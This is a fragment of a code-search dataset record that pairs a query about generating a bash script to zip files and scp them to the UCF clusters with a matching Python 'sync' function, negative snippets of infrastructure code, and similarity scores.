put_request(r1[\"host\"],session, endpoint, payload)\n print(results)\n\n save_endpoint = \"restconf/operations/cisco-ia:save-config/\"\n saved = save_config(r1[\"host\"], session, save_endpoint)\n\n # target_routers = [\"dev-r1\"]\n\n # for host_key, attribs in inventory.items():\n\n # if host_key in target_routers:\n # print(f\"configuring interfaces on {host_key}\")\n\n # # create a session imported from restconf_api\n # session = create_session(attribs)\n\n # # get all interfaces\n # results = get_interface(attribs, session, \"Loopback0\")\n\n # interface = results[\"ietf-interfaces:interface\"]\n\n # print(json.dumps(interface))\n # # convert to yaml\n # # yaml_output = yaml.safe_dump(results)\n # # with open(\"vars/interfaces.yml\", \"w\") as file:\n # # file.write(yaml_output)\n\n # # results = update_interfaces(attribs, session)\n # # print(results.text, results.status_code)\n\n # # print(get_interfaces(attribs, session))", "def main():\n run_nutanix_vm_creation_module()", "def main():\n insert_gateway_values(\"hermes/bin/gateways.txt\")\n return", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n key = config.get('AWS', 'KEY')\n secret = config.get('AWS', 'SECRET')\n region = config.get('AWS', 'REGION')\n iam_role_name = config.get('IAM_ROLE', 'NAME')\n cluster_identifier = config.get('REDSHIFT', 'IDENTIFIER')\n\n iam = boto3.client('iam',\n aws_access_key_id=key,\n aws_secret_access_key=secret,\n region_name=region)\n\n redshift = boto3.client('redshift',\n aws_access_key_id=key,\n aws_secret_access_key=secret,\n region_name=region)\n\n create_redshift_iam_role(iam, iam_role_name)\n attach_redshift_iam_role_policy(iam, iam_role_name)\n iam_role_arn = get_redshift_iam_role_arn(iam, iam_role_name)\n print('Created IAM Role Arn is: ' + iam_role_arn)\n create_redshift_cluster(redshift, config, iam_role_arn)\n redshift_cluster_host = get_redshift_cluster_host(redshift, cluster_identifier)\n print('Created Redshift Cluster Host is: ' + redshift_cluster_host)", "def main(connection_file):\n\n ctx = zmq.Context.instance()\n\n with open(connection_file) as f:\n cfg = json.loads(f.read())\n\n reg_url = cfg['interface']\n iopub_port = cfg['iopub']\n iopub_url = f\"{reg_url}:{iopub_port}\"\n\n session = Session(key=cfg['key'].encode('ascii'))\n sub = ctx.socket(zmq.SUB)\n\n # This will subscribe to all messages:\n sub.SUBSCRIBE = b''\n # replace with b'' with b'engine.1.stdout' to subscribe only to engine 1's stdout\n # 0MQ subscriptions are simple 'foo*' matches, so 'engine.1.' subscribes\n # to everything from engine 1, but there is no way to subscribe to\n # just stdout from everyone.\n # multiple calls to subscribe will add subscriptions, e.g. 
to subscribe to\n # engine 1's stderr and engine 2's stdout:\n # sub.SUBSCRIBE = b'engine.1.stderr'\n # sub.SUBSCRIBE = b'engine.2.stdout'\n sub.connect(iopub_url)\n while True:\n try:\n idents, msg = session.recv(sub, mode=0)\n except KeyboardInterrupt:\n return\n # ident always length 1 here\n topic = idents[0].decode('utf8', 'replace')\n if msg['msg_type'] == 'stream':\n # stdout/stderr\n # stream names are in msg['content']['name'], if you want to handle\n # them differently\n print(\"{}: {}\".format(topic, msg['content']['text']))\n elif msg['msg_type'] == 'error':\n # Python traceback\n c = msg['content']\n print(topic + ':')\n for line in c['traceback']:\n # indent lines\n print(' ' + line)\n elif msg['msg_type'] == 'error':\n # Python traceback\n c = msg['content']\n print(topic + ':')\n for line in c['traceback']:\n # indent lines\n print(' ' + line)", "def open_chef_connection(args):\n\n chefserver = chef_api.Cheferizer(\n url=args.get('auth_url'),\n client_pem=args.get('client_key'),\n user=args.get('client_name')\n )\n chefserver.open_pem()\n return chefserver", "def main():\n\n global _CLIENT\n\n logging.basicConfig(level=logging.DEBUG)\n app.logger.setLevel(logging.INFO)\n\n _CLIENT = Client('192.168.0.120', 443, 'root', 'calvin')\n _CLIENT.connect()\n\n\n app.run(debug=True)" ]
[ "0.65127397", "0.62745446", "0.59723467", "0.5956529", "0.59374183", "0.58881605", "0.5853393", "0.5802111", "0.57484627", "0.5721694", "0.5707348", "0.5700164", "0.5663848", "0.56471217", "0.56392187", "0.5619558", "0.55862945", "0.5568309", "0.5539452", "0.55311024", "0.5530674", "0.55116695", "0.5496154", "0.5495479", "0.54924494", "0.54732805", "0.5468134", "0.5462904", "0.5452154", "0.5452069", "0.54285145", "0.54237753", "0.5407396", "0.5405575", "0.54032487", "0.5394105", "0.53903717", "0.53848433", "0.5379566", "0.53763723", "0.53732634", "0.5370054", "0.5370054", "0.5370054", "0.53644365", "0.53577656", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5352218", "0.5344678", "0.5325287", "0.52991164", "0.52775836", "0.5273334", "0.52598697", "0.525778", "0.52549106", "0.5247554", "0.52419424", "0.5229726", "0.52224475", "0.5221046", "0.521383", "0.5203353", "0.51979953", "0.5196941", "0.51955503", "0.51953423", "0.5188907", "0.51672906", "0.5163767", "0.5159386", "0.51522136", "0.5148787", "0.5141309" ]
0.58358824
7
This module creates a bash script that compresses the desired files and folders and copies them to the UCF Clusters. For security purposes, this module does not save passwords or passphrases.
def sync(directory_1, directory_2, key_address, user, server): import os # Creates a list of files in the working directory files = os.listdir() # If the bash file already exists, it deletes the bash file before making progress if 'sync.sh' in files: os.remove('sync.sh') else: pass with open('sync.sh', 'w') as f: f.write('#!/bin/bash\n') f.write('zip -r my_files.zip ' + str(directory_1) + '\n') f.write('scp -i ' + str(key_address) + ' my_files.zip ' + str(user) + \ '@' + str(server) + ':' + str(directory_2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pack():\n clean_local()\n build()\n copy_json()\n optimize()\n tarball()", "def copy_scfu_folder(chem_form):\n\n src = calc_root + \"/\" + chem_form + \"/first_scfu/tmp\"\n dest = calc_root + \"/\" + chem_form + \"/hp/tmp\"\n\n f = open(\"rysnc.sh\",'w')\n f.write(\"\"\"\n #!/bin/bash\n\n # SETUP OPTIONS\n export SRCDIR=\"%s\"\n export DESTDIR=\"%s\"\n export THREADS=\"8\"\n\n # RSYNC DIRECTORY STRUCTURE\n rsync -zr -f\"+ */\" -f\"- *\" $SRCDIR/ $DESTDIR/ \\\n # FIND ALL FILES AND PASS THEM TO MULTIPLE RSYNC PROCESSES\n cd $SRCDIR && find . ! -type d -print0 | xargs -0 -n1 -P$THREADS -I%% rsync -az %% $DESTDIR/%%\"\"\"%(src,dest))\n f.close()\n subprocess.call(shlex.split(\"chmod +x rysnc.sh\"))\n subprocess.call(shlex.split(\"sh rysnc.sh\"))\n return", "def main():\n parser = argparse.ArgumentParser(description='Create packaged set of modulefiles for deployment on OASIS.')\n parser.add_argument('--location', dest='location', default=None,\n help='Location directory to place files in')\n parser.add_argument('--tarfile', dest='tarfile', default=None,\n help='Name of tarfile to generate')\n args = parser.parse_args(sys.argv[1:])\n if args.location is None:\n args.location = tempfile.mkdtemp()\n elif os.path.exists(args.location):\n overwrite = raw_input(\"{0} exists, overwrite? \".format(args.location))\n if overwrite.lower().strip() != 'y':\n sys.stderr.write(\"Exiting...\")\n sys.exit(0)\n shutil.rmtree(args.location)\n os.mkdir(args.location)\n else:\n os.mkdir(args.location)\n location = checkout_repo(args.location) \n if location is None:\n sys.stderr.write(\"Can't checkout modulefiles to {0}!\\n\".format(args.location))\n package_files(location)\n if args.tarfile is None:\n args.tarfile = \"/tmp/moduleupdate.tar.gz\"\n if tar_files(location, args.tarfile) is None:\n sys.stderr.write(\"Error generating tarfile, exiting\\n\")\n sys.exit(1)\n shutil.rmtree(location)\n sys.stdout.write(\"Packaged files located at {0}\\n\".format(args.tarfile))", "def do_pack():\n\n now = datetime.now()\n # format the name of the file with the timestamps\n now_year = now.year\n now_month = now.month\n now_day = now.day\n now_hour = now.hour\n now_minute = now.minute\n now_second = now.second\n # apply the format\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(\n now_year, now_month, now_day, now_hour, now_minute, now_second\n )\n # All archives must be stored in the folder versions\n local('mkdir -p versions')\n # execute locally the compression of the folder\n command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n # return the archive path if the archive has been correctly generated\n if command.succeeded:\n return file_name\n else:\n return None", "def script(arch, version, variant, packages, mirror, disk_size, swap_size, image_format, root_password, hostname, no_confirm, output):\n\n # Checking validity of the command-line arguments.\n check_arguments(locals())\n\n # Checking if dependencies for this script are installed.\n check_dependencies(arch)\n\n # Make sure output value is correct and we won't run into any issue at the\n # final step (moving the result to its final location). 
We check the file\n # does not exist, and if its parent directory does exist.\n output = os.path.abspath(output)\n assert not os.path.exists(output), \"output value is incocrect; destination exists\"\n assert os.path.isdir(os.path.dirname(output)), \"output value is incorrect; parent folder does not exist\"\n\n # Compute partitions info (todo; compute actual infos)\n partitions = [\n ('esp', 512, 'fat32', 42, 42),\n ('root', 512, 'ext4', 42, 42),\n ('swap', 512, 'swap', 42, 42)\n ]\n\n # Compute list of packages that will be explicitly installed.\n packages = compute_packages(packages, locals())\n\n # Printing summary and asking for confirmation.\n summary_mesage = compute_summary_message(locals())\n\n if not no_confirm:\n summary_mesage += \\\n \"\\nPass the --no-confirm flag if you don't want to be prompted for confirmation.\\n\"\n\n print(summary_mesage)\n\n if not no_confirm:\n is_confirmed = input(\"Do you confirm those options ? [y/n] \")\n if not is_confirmed.lower().startswith('y'):\n print(\"Abort!\")\n exit(1)\n\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(f\"Creating a raw disk image of size {disk_size}MiB\")\n disk_path = create_disk_image(tmp_dir, disk_size)\n\n print(\"Partitioning the disk...\")\n partition_disk(disk_path, disk_size, swap_size)\n\n loop_device = '/dev/loop42'\n with attach_to_loop_device(disk_path, loop_device):\n print(\"Formatting partitions...\")\n format_partitions(loop_device)\n\n mount_dir = os.path.join(tmp_dir, 'mnt')\n os.mkdir(mount_dir)\n\n with mount_root_partition(loop_device, mount_dir):\n create_chroot_environment(mount_dir, arch, version, variant, mirror, packages)\n\n # In order to chroot into a filesystem with an architecture\n # different than the host, we need to install a binary\n # interpreter.\n if arch == 'armhf':\n print(\"Copying qemu-arm-static to the chroot environment\")\n shutil.copy2('/usr/bin/qemu-arm-static', os.path.join(mount_dir, 'usr/bin/'))\n elif arch == 'arm64':\n print(\"Copying qemu-aarch64-static to the chroot environment\")\n shutil.copy2('/usr/bin/qemu-aarch64-static', os.path.join(mount_dir, 'usr/bin/'))\n\n with mount_boot_partition(loop_device, mount_dir):\n with mount_transient_files(mount_dir):\n # Configure the GRUB boot loader.\n if arch == 'armhf':\n grub_package = 'grub-efi-arm'\n grub_target = 'arm-efi'\n elif arch == 'arm64':\n grub_package = 'grub-efi-arm64'\n grub_target = 'arm64-efi'\n elif arch == 'amd64':\n grub_package = 'grub-efi-amd64'\n grub_target = 'x86_64-efi'\n\n update_system_cmd = ['apt-get', 'update']\n run_chroot_command(update_system_cmd, mount_dir, arch)\n\n install_grub_pkg_cmd = ['apt-get', 'install', '-y', '--install-recommends', grub_package]\n run_chroot_command(install_grub_pkg_cmd, mount_dir, arch)\n\n purge_osprober_cmd = ['apt-get', '--autoremove', '-y', 'purge', 'os-prober']\n run_chroot_command(purge_osprober_cmd, mount_dir, arch)\n\n # Adjust the '/etc/default/grub' file\n with open(os.path.join(mount_dir, 'etc/default/grub'), 'r') as file:\n text = file.read()\n\n # TODO; adjust text variable\n\n with open(os.path.join(mount_dir, 'etc/default/grub'), 'w') as file:\n file.write(text)\n\n grub_mkconfig_cmd = ['grub-mkconfig', '-o', '/boot/grub/grub.cfg']\n run_chroot_command(grub_mkconfig_cmd, mount_dir, arch)\n\n grub_install_cmd = [\n 'grub-install',\n f'--target={grub_target}',\n '--force-extra-removable',\n '--no-nvram',\n '--no-floppy',\n '--modules=\\\\\"part_msdos part_gpt\\\\\"',\n '--grub-mkdevicemap=/boot/grub/device.map',\n loop_device\n ]\n 
run_chroot_command(grub_install_cmd, mount_dir, arch)\n\n print(\"Updating /etc/hostname\")\n configure_hostname(mount_dir, 'foo')\n\n print(\"Updating /etc/fstab\")\n configure_fstab(mount_dir)\n\n print(\"Updating /etc/network/interfaces\")\n configure_network_interfaces(mount_dir)\n\n # TODO; run user provided script here...\n\n # Remove the binary interpreter from the chroot environment.\n if arch == 'armhf':\n print(\"Removing qemu-arm-static from the chroot environment\")\n os.remove(os.path.join(mount_dir, 'usr/bin/qemu-arm-static'))\n elif arch == 'arm64':\n print(\"Removing qemu-aarch64-static from the chroot environment\")\n os.remove(os.path.join(mount_dir, 'usr/bin/qemu-aarch64-static'))\n\n # Convert raw disk image to the requested format and and move the result to\n # the requested location.\n if image_format != 'raw':\n print(f\"Converting disk image to {image_format} format...\")\n\n new_disk_path = os.path.join(tmp_dir, 'disk.' + image_format)\n subprocess.run([\n 'qemu-img', 'convert',\n '-f', 'raw',\n '-O', image_format,\n disk_path, new_disk_path\n ])\n\n disk_path = new_disk_path\n\n shutil.move(disk_path, output)\n\n print(\"Done!\")", "def main():\r\n parser = CommonArgParser(__file__)\r\n parser.add_argument('src_dir', help='Source directory')\r\n parser.add_argument(\r\n 'out_dir',\r\n default='.',\r\n help=\"\"\"The directory the files to be extracted.\r\n (Default: Current directoty\"\"\")\r\n args = parser.parse_all()\r\n for f in next_file(args.src_dir, ['*.tgz', '*.tar.gz']):\r\n untgz(f, args.out_dir)", "def main():\n run_time_str = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n log = _prepare_logging()\n Args = collections.namedtuple(\n \"Args\",\n (\n \"input_paths\",\n \"output_path\",\n \"root_directory\",\n \"ignore_dotfiles\",\n \"ignore_windows_volume_folders\",\n ),\n )\n # If we are running from Mac Automator, take file paths from sys.argv\n if check_running_from_automator():\n # Example sys.argv for two files selected: ['-c', '/absolute/path/1.txt',\n # '/absolute/path/to/2.txt']\n args = Args(\n input_paths=sys.argv[1:],\n output_path=None,\n root_directory=False,\n ignore_dotfiles=False,\n ignore_windows_volume_folders=False,\n )\n # Otherwise, use argparse and allow for some additional options\n else:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_paths\", nargs=\"+\", help=\"Items to compress\")\n parser.add_argument(\"-o\", \"--output_path\", \"--output\", help=\"Filename for zip\")\n parser.add_argument(\n \"-d\",\n \"--root-directory\",\n action=\"store_true\",\n help=\"Place all files in zip within a shared parent folder\",\n )\n parser.add_argument(\n \"--ignore-dotfiles\",\n action=\"store_true\",\n help=\"Ignore files and folders beginning with '.' 
(typically these are hidden folders)\",\n )\n parser.add_argument(\n \"--ignore-windows-volume-folders\",\n action=\"store_true\",\n help=(\n \"Ignore folders named 'System Volume Information' and '$RECYCLE.BIN' (typically\"\n \" these contain hidden system information)\"\n ),\n )\n\n parsed_args = parser.parse_args()\n args = Args(**vars(parsed_args))\n\n # Check passed arguments and return if issues\n if get_missing_sources(args.input_paths):\n printer(\n \"Path(s) {} not found\".format(get_list_as_str(get_missing_sources(args.input_paths))),\n \"error\",\n True,\n )\n return\n\n # Set path separator based on OS\n if platform.system() == \"Windows\":\n path_separator = \"\\\\\"\n else:\n path_separator = \"/\"\n\n # Convert input paths into absolute paths\n input_paths = [os.path.abspath(path) for path in args.input_paths]\n\n # Set output path\n if args.output_path is not None:\n output_path = args.output_path\n output_directory = os.path.dirname(output_path)\n else:\n if check_running_from_automator():\n # Last item in the list of arguments will be the last item clicked in Finder\n output_directory = os.path.dirname(input_paths[-1])\n else:\n output_directory = \".\"\n if len(input_paths) == 1:\n output_filename = os.path.basename(\"{}.zip\".format(input_paths[0]))\n else:\n output_filename = \"{}_archive.zip\".format(run_time_str)\n output_path = get_safe_file_path(os.path.join(output_directory, output_filename))\n printer(\"Zip file will be created at path '{}'\".format(output_path), \"info\")\n\n # Create zipfile and get file_hash_dict info for subsequent verification\n try:\n file_hash_dict, total_file_count = create_zip(\n output_path,\n input_paths,\n args.ignore_dotfiles,\n args.ignore_windows_volume_folders,\n args.root_directory,\n path_separator,\n )\n except:\n # Log the exception to a file, so we can view later if running from Automator\n error_log_file_path = os.path.join(\n output_directory, \"{}_verizip_error.txt\".format(run_time_str)\n )\n error_log_handler = logging.FileHandler(error_log_file_path)\n error_log_handler.setLevel(logging.ERROR)\n error_log_handler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n )\n log.addHandler(error_log_handler)\n log.exception(\"Exception occurred during creation of zip file '%s':\", output_path)\n printer(\n \"Error occurred - see '{}'\".format(os.path.abspath(error_log_file_path)), \"error\", True\n )\n if os.path.isfile(output_path):\n os.remove(output_path)\n return\n printer(\"'{}' finalised - will now be verified\".format(output_path), \"info\")\n\n # Get hashes of files within finalised zip\n zip_hash_dict = {}\n with zipfile.ZipFile(output_path, \"r\") as zip_handler:\n zip_file_listing = zip_handler.namelist()\n zip_file_count = 0\n for file_within_zip in zip_file_listing:\n # Todo: confirm no 'file_info.is_dir()' type check needed here - don't believe so, as\n # only files with paths are being added, rather than directories as separate archive\n # items\n zip_file_count += 1\n hash_value = hash_file_in_zip(zip_handler, file_within_zip)\n if hash_value not in zip_hash_dict:\n zip_hash_dict[hash_value] = []\n zip_hash_dict[hash_value].append(file_within_zip)\n\n # Verify that hashes from source files match those for compressed files within newly-created zip\n if file_hash_dict == zip_hash_dict and total_file_count == zip_file_count:\n printer(\"Verification complete; no discrepancies identified\", \"info\")\n printer(\"'{}' created successfully\".format(output_path), \"info\", True)\n 
else:\n error_log_file_path = os.path.join(\n output_directory, \"{}_verizip_error.txt\".format(run_time_str)\n )\n with open(error_log_file_path, \"w\") as error_log_file_handler:\n for hash_value, file_paths in file_hash_dict.items():\n if hash_value not in zip_hash_dict:\n error_log_file_handler.write(\n \"Hash '{}' not present in zip file (with expected files {})\\n\".format(\n hash_value, get_list_as_str(file_paths)\n )\n )\n elif sorted(file_paths) != sorted(zip_hash_dict[hash_value]):\n error_log_file_handler.write(\n \"Files for hash '{}' do not match between source and zip ({} in source - {}\"\n \" in zip)\\n\".format(hash_value, file_paths, zip_hash_dict[hash_value])\n )\n printer(\n \"'{}' failed verification - see error log at '{}'\".format(\n output_path, os.path.abspath(error_log_file_path)\n ),\n \"error\",\n True,\n )\n os.remove(output_path) # Delete the zip that failed verification", "def prep(path,date,image):\n \n # run bash code with 'Popen'\n P = Popen('cp '+path+date+'/final/'+image+' ./', shell=True)\n P.wait()\n P = Popen('mv '+image+' '+image+'.fz', shell=True)\n P.wait()\n P = Popen('funpack *.fz', shell=True)\n P.wait()\n P = Popen('rm -rf *.fz', shell=True)\n P.wait()", "def main():\n if len(sys.argv) != 2:\n print(\"Error: Incorrect number of arguments. Expected 1.\")\n print(\"Usage: python compress.py <path to file to compress>\")\n print(\"Example: python compress.py zones.json\")\n exit(1)\n\n with open(sys.argv[1], \"rb\") as r, \\\n open(\"{}.br\".format(sys.argv[1]), \"wb\") as w:\n w.write(brotli.compress(r.read()))", "def setup(self, **kwargs):\n if self.bash_script:\n src = os.fspath(FILES / self.bash_script)\n dst = os.fspath(self.project_dir / self.bash_script)\n shutil.copy(src, dst)", "def do_pack():\n time_test = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n file_name = \"versions/web_static_\" + time_test + \".tgz\"\n command1 = \"mkdir -p versions\"\n command2 = \"tar -czvf \" + file_name + \" web_static\"\n local(command1)\n com = local(command2)\n if com.return_code == 0:\n return file_name\n else:\n return None", "def package():\n \n hou.hipFile.save()\n currentHip = hou.expandString(hou.hipFile.name())\n\n # create a temp directory we are going to fill with crap\n tempFilePath = tempfile.mkdtemp()\n \n otls = os.path.join(tempFilePath, \"otls\")\n os.mkdir(otls)\n files = os.path.join(tempFilePath, \"files\")\n os.mkdir(files)\n \n # Get all the external references to the hipfile\n fileOnDisk = hou.fileReferences()\n\n # loop and do what comes natural.\n for _file in fileOnDisk:\n\n parm = _file[0]\n filepath = _file[1]\n \n # if its a otl we need to store it.\n if filepath.endswith(\".otl\"):\n \n shutil.copy(hou.expandString(filepath), otls)\n \n else:\n \n if not os.path.isfile(hou.expandString(filepath)): \n \n continue\n \n # create a directory in files and save 1 file to that location\n tmpFileName = os.path.basename(hou.expandString(filepath))\n tmpFileDir = os.path.basename(os.path.dirname(hou.expandString(filepath)))\n path = os.path.join(files, tmpFileDir)\n \n if not os.path.isdir(path):\n \n os.mkdir(path)\n\n shutil.copy(hou.expandString(filepath), os.path.join(path, os.path.basename(hou.expandString(filepath))))\n\n try:\n \n if not parm.node().isLocked():\n \n parm.set(os.path.join(path.replace(tempFilePath, \"$HIP\"), tmpFileName))\n \n except hou.PermissionError: \n \n logging.warning(\"Error hardening parm :\" + str(parm.name()) + \"on node \" +parm.node().path())\n\n hou.hipFile.save(os.path.join(tempFilePath, 
os.path.basename(hou.expandString(hou.hipFile.name()))))\n # Load the source hipfile\n hou.hipFile.load(currentHip)\n \n # create a zipfile and package everything. then copy it to the home.\n zipfileLoc = zipdir(tempFilePath)\n shutil.move(zipfileLoc, os.path.join(hou.expandString(\"~\"), \"package.zip\"))\n shutil.rmtree(tempFilePath)", "def run(self):\n self.compress(\n self.__config.public_key(),\n self.__config.input_dir(),\n self.__config.output_dir(),\n self.__config.suffix()\n )", "def unpack_or_cp():\n if args.input_type == \"zip\":\n zip_out, zip_error = Popen([\"unzip\", args.input, \"-d\", args.out_folder.strip() + \"/fasta\"], stdout=PIPE,stderr=PIPE).communicate()\n admin_log(zip_out, zip_error)\n else:\n cp_out, cp_error = Popen([\"cp\", args.input, args.out_folder.strip() + \"/fasta\"], stdout=PIPE,stderr=PIPE).communicate()\n admin_log(cp_out, cp_error)", "def main(args):\n\n for dir in args.dirs:\n # prepdir = mdssprep.Directory(dir,exclude=['file_*3*','file_2??'],include=['file_*5*'],maxarchivesize=mdssprep.one_meg*200.,minsize=mdssprep.one_meg*100.)\n prepdir = mdssprep.Directory(dir)\n prepdir.archive(dryrun=False)", "def do_cp(cs, args):\n if ':' in args.source:\n source_parts = args.source.split(':', 1)\n container_id = source_parts[0]\n container_path = source_parts[1]\n opts = {}\n opts['id'] = container_id\n opts['path'] = container_path\n\n res = cs.containers.get_archive(**opts)\n dest_path = args.destination\n tardata = io.BytesIO(res['data'])\n with closing(tarfile.open(fileobj=tardata)) as tar:\n tar.extractall(dest_path) # nosec\n\n elif ':' in args.destination:\n dest_parts = args.destination.split(':', 1)\n container_id = dest_parts[0]\n container_path = dest_parts[1]\n filename = os.path.split(args.source)[1]\n opts = {}\n opts['id'] = container_id\n opts['path'] = container_path\n tardata = io.BytesIO()\n with closing(tarfile.open(fileobj=tardata, mode='w')) as tar:\n tar.add(args.source, arcname=filename)\n opts['data'] = tardata.getvalue()\n cs.containers.put_archive(**opts)\n\n else:\n print(\"Please check the parameters for zun copy!\")\n print(\"Usage:\")\n print(\"zun cp container:src_path dest_path|-\")\n print(\"zun cp src_path|- container:dest_path\")", "def run(self):\n self.archive_bash_inits()\n self.create_paths()\n self.copy_files()\n self.make_git_config()\n self.ensure_bash_history()", "def main():\n\n print \"Starting tar-maker script..\"\n # String of files we're going to be looking for\n files=\"runlocaltests.py testprocess.py verifyfiles.mix cleanup_deploy.py hashes.dict upgrade_nodes.sh deploy_helper.py\"\n\n # TODO: add list of 'optional files' to include\n\n # get the files passed in as arguments\n files_from_args = ''\n # 1 skips this file name\n print\n \n for eachfile in range(1, len(sys.argv)):\n print \"Adding custom file: \"+sys.argv[eachfile]\n files_from_args+=' '+sys.argv[eachfile]\n print\n # mash the two strings together now\n files+=files_from_args\n\n # Total number of files split by spaces\n total_files=len(files.split(' '))\n\n # Counter for found files\n num_files_found=0\n\n # Temporary tar, incrementally we'll build it up\n # Will remove the temp files (since I use -update flag)\n # for building up the .tar\n if os.path.isfile('./deploy.tar.temp'):\n os.remove('./deploy.tar.temp')\n\n\n for filename in files.split(' '):\n print ' Looking for '+filename+' in '+os.getcwd()\n if os.path.isfile('./'+filename):\n print ' File found!'\n num_files_found += 1\n shellexec('tar -rf deploy.tar.temp '+filename)\n else:\n print 
' WARNING: '+filename+' NOT FOUND'\n\n print\n print \"Found \"+str(num_files_found)+\" of \"+str(total_files)+\" necessary files.\"\n print\n\n # Did we find all of the files?\n if num_files_found == total_files:\n print\n print 'All files found, finishing tar..'\n # rename the file to the final name.\n # this will over-write current deploy.tar in the dir if one exists \n shellexec('mv deploy.tar.temp deploy.tar')\n return 0\n else:\n print 'FATAL ERROR: Not all the files where found, please check that '\n print ' this script is in the same directory as the files. '\n print\n print \"Cleaning up temp files...\"\n \n # remove deploy.tar.temp only if it exists.\n if os.path.isfile('./deploy.tar.temp'):\n os.remove('./deploy.tar.temp')\n \n print\n print 'Finished (with errors)'\n return 1", "def setup(zip_path, dest_path):\n\n #makes folder for zip files\n make_directory(zip_path)\n\n #makes folder for processed data\n make_directory(dest_path)", "def gzip_assets():\n run('cd %(repo_path)s; python gzip_assets.py' % env)", "def main(binary_name, code_directory, verbose, clase):\n print(\"Start of binaries generation\")\n #Directory to iterate\n directory = '../../results/'+code_directory + '/' + clase + '/application_signature/'\n #Directory to store the binaries to generate\n bin_directory = './bin/'\n #Task to performed on the new script\n make_clean = 'make clean\\n'\n for dirs in os.listdir(directory):\n print('Generating binary for path', dirs)\n if os.path.exists(directory+dirs+'/bin/'+dirs):\n os.remove(directory+dirs+'/bin/'+dirs)\n #Creation of the script\n with open(directory+dirs+'/make_bin.sh', 'w') as bin_file:\n bin_file.write('#! /bin/bash\\n')\n bin_file.write(make_clean+'\\n')\n bin_file.write('make '+code_directory+' CLASS='+clase+'\\n')\n bin_file.write('mv '+bin_directory+binary_name+' '+bin_directory+binary_name+'_'+dirs+'\\n')\n bin_file.write(make_clean)\n bin_file.close()\n try:\n #Changing privileges so script can be executed automatically\n os.chmod(directory+dirs+'/make_bin.sh', 0o777)\n #Move to directory where script is to be executed\n cwd = os.getcwd()\n #Change cwd to execute script generating the binary\n os.chdir(directory+dirs)\n if verbose:\n subprocess.check_call('./make_bin.sh')\n else:\n subprocess.check_call('./make_bin.sh', stdout=subprocess.PIPE, shell=False)\n \n os.chdir(cwd)\n except FileNotFoundError as e:\n logger.error(e)\n raise\n print('End of binaries generation')", "def do_pack():\n local(\"sudo mkdir -p versions\")\n date_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n name_file = \"versions/web_static{}.tgz\".format(date_time)\n local(\"sudo tar -cvzf {} web_static\".format(name_file))\n return name_file", "def create_bootstrap_script(scratch_dir):\n install_script = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"install\")\n shutil.copy(install_script, os.path.join(scratch_dir, \"install\"))", "def execution_transfer_script(self, resources):\n\n # fixme -- json is an inefficient pickle.\n # - slow\n # - nodes will need to be dealiased again.\n #\n manifest_s = repr(json.dumps(self.data.manifest()))\n canonical_s = repr(json.dumps(self.data.canonical()))\n resources_s = repr(resources)\n\n # this doesn't get carried on the other side\n default_region = _get_default_region()\n\n hooks = \"\\n\".join(runtime.add_user_hook._hooks)\n\n return \"\"\"#!/usr/bin/env python3\nimport bunnies.runtime\nimport bunnies.constants as C\nfrom bunnies.unmarshall import unmarshall\nimport os, os.path\nimport json\nimport logging\nlog = 
logging.getLogger()\n\n# USER HOOKS START\n%(hooks)s\n# USER HOOKS END\n\nuid_s = %(uid_s)s\n\ncanonical_s = %(canonical_s)s\n\nmanifest_s = %(manifest_s)s\n\nmanifest_obj = json.loads(manifest_s)\n\ncanonical_obj = json.loads(canonical_s)\n\nbunnies.setup_logging()\n\n# this is for align binaries\nos.environ['AWS_REGION'] = %(default_region)s\n# this is for the boto client\nos.environ['AWS_DEFAULT_REGION'] = %(default_region)s\n\ntransform = unmarshall(manifest_obj)\nlog.info(\"%%s\", json.dumps(manifest_obj, indent=4))\n\nparams = {\n 'workdir': os.environ.get('BUNNIES_WORKDIR'),\n 'scriptdir': os.path.dirname(__file__),\n 'job_id': os.environ.get('BUNNIES_JOBID'),\n 'resources': %(resources_s)s\n }\n\nbunnies.runtime.setenv_batch_metadata()\nenv_copy = dict(os.environ)\n\n# core of the work\noutput = transform.run(**params)\n\n# write results\nresult_path = os.path.join(transform.output_prefix(), C.TRANSFORM_RESULT_FILE)\nbunnies.runtime.update_result(result_path,\n output=output,\n manifest=manifest_obj,\n canonical=canonical_obj,\n environment=env_copy)\n\"\"\" % {\n 'manifest_s': manifest_s,\n 'canonical_s': canonical_s,\n 'default_region': repr(default_region),\n 'uid_s': repr(self.uid),\n 'hooks': hooks,\n 'resources_s': resources_s\n}", "def _install():\n download_file='http://www.ipol.im/pub/art/2015/136/inpaint_8.tgz'\n tools.download_and_extract(download_file) \n this_file_path=os.path.dirname(__file__)\n subprocess.call(' mkdir build; cd build; cmake ..; make', shell=True,cwd=exec_folder)", "def bulk_upload ( server, identity, src_dir, tgt_dir ) :\n tmp_tarfilepath = '/tmp/'\n tmp_tarfilename = server + '.tar.gz'\n tmp_file = tmp_tarfilepath + tmp_tarfilename\n\n # Tar up the src directory\n s = subprocess.call( [ '/bin/sh', '-c',\n 'cd ' + src_dir + ' && tar czf ' + tmp_file + ' .' 
